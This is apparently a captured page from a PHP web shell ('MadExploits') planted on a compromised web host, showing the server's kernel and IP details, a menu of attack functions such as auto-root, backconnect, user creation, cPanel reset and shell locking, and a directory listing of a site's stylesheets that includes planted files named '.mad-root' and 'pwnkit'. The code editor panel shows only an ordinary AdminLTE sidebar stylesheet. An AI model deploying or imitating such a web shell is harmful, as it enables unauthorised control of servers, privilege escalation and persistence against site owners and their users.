Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.117.158.124
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
gomti /
myadmin /
build /
less /
[ HOME SHELL ]
Name
Size
Permission
Action
skins
[ DIR ]
drwxr-xr-x
.csslintrc
545
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404_500_errors.less
702
B
-rw-r--r--
AdminLTE-without-plugins.less
1.54
KB
-rw-r--r--
AdminLTE.less
1.55
KB
-rw-r--r--
alerts.less
641
B
-rw-r--r--
bootstrap-social.less
3.2
KB
-rw-r--r--
boxes.less
7.92
KB
-rw-r--r--
buttons.less
3.06
KB
-rw-r--r--
callout.less
846
B
-rw-r--r--
carousel.less
268
B
-rw-r--r--
control-sidebar.less
5.37
KB
-rw-r--r--
core.less
2.77
KB
-rw-r--r--
direct-chat.less
2.98
KB
-rw-r--r--
dropdown.less
6.71
KB
-rw-r--r--
forms.less
1.85
KB
-rw-r--r--
fullcalendar.less
1.73
KB
-rw-r--r--
header.less
4.69
KB
-rw-r--r--
info-box.less
1.11
KB
-rw-r--r--
invoice.less
201
B
-rw-r--r--
labels.less
326
B
-rw-r--r--
lockscreen.less
1.12
KB
-rw-r--r--
login_and_register.less
707
B
-rw-r--r--
mailbox.less
1.19
KB
-rw-r--r--
miscellaneous.less
8.52
KB
-rw-r--r--
mixins.less
6.92
KB
-rw-r--r--
modal.less
1.27
KB
-rw-r--r--
navs.less
3.75
KB
-rw-r--r--
plugins.less
119
B
-rw-r--r--
print.less
967
B
-rw-r--r--
products.less
776
B
-rw-r--r--
profile.less
452
B
-rw-r--r--
progress-bars.less
1.64
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
select2.less
2.64
KB
-rw-r--r--
sidebar-mini.less
3.68
KB
-rw-r--r--
sidebar.less
3.04
KB
-rw-r--r--
small-box.less
1.41
KB
-rw-r--r--
social-widgets.less
1.37
KB
-rw-r--r--
table.less
897
B
-rw-r--r--
timeline.less
1.91
KB
-rw-r--r--
users-list.less
602
B
-rw-r--r--
variables.less
3.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar.less
/* * Component: Sidebar * ------------------ */ //Main Sidebar // ``` .left-side has been deprecated as of 2.0.0 in favor of .main-sidebar ``` .main-sidebar, .left-side { position: absolute; top: 0; left: 0; padding-top: 50px; min-height: 100%; width: @sidebar-width; z-index: 810; //Using disposable variable to join statements with a comma @transition-rule: @transition-speed @transition-fn, width @transition-speed @transition-fn; .transition-transform(@transition-rule); @media (max-width: @screen-header-collapse) { padding-top: 100px; } @media (max-width: @screen-xs-max) { .translate(-@sidebar-width, 0); } .sidebar-collapse & { @media (min-width: @screen-sm) { .translate(-@sidebar-width, 0); } } .sidebar-open & { @media (max-width: @screen-xs-max) { .translate(0, 0); } } } .sidebar { padding-bottom: 10px; } // remove border from form .sidebar-form { input:focus { border-color: transparent; } } //Sidebar user panel .user-panel { position: relative; width: 100%; padding: 10px; overflow: hidden; .clearfix(); > .image > img { width: 100%; max-width: 45px; height: auto; } > .info { padding: 5px 5px 5px 15px; line-height: 1; position: absolute; left: 55px; > p { font-weight: 600; margin-bottom: 9px; } > a { text-decoration: none; padding-right: 5px; margin-top: 3px; font-size: 11px; > .fa, > .ion, > .glyphicon { margin-right: 3px; } } } } // Sidebar menu .sidebar-menu { list-style: none; margin: 0; padding: 0; //First Level > li { position: relative; margin: 0; padding: 0; > a { padding: 12px 5px 12px 15px; display: block; > .fa, > .glyphicon, > .ion { width: 20px; } } .label, .badge { margin-right: 5px; } .badge { margin-top: 3px; } } li.header { padding: 10px 25px 10px 15px; font-size: 12px; } li > a > .fa-angle-left, li > a > .pull-right-container > .fa-angle-left { width: auto; height: auto; padding: 0; margin-right: 10px; } li > a > .fa-angle-left { position: absolute; top: 50%; right: 10px; margin-top: -8px; } li.active { > a > .fa-angle-left, > a > .pull-right-container > .fa-angle-left { .rotate(-90deg); } > .treeview-menu { display: block; } } // Tree view menu .treeview-menu { display: none; list-style: none; padding: 0; margin: 0; padding-left: 5px; .treeview-menu { padding-left: 20px; } > li { margin: 0; > a { padding: 5px 5px 5px 15px; display: block; font-size: 14px; > .fa, > .glyphicon, > .ion { width: 20px; } > .pull-right-container > .fa-angle-left, > .pull-right-container > .fa-angle-down, > .fa-angle-left, > .fa-angle-down { width: auto; } } } } }
Close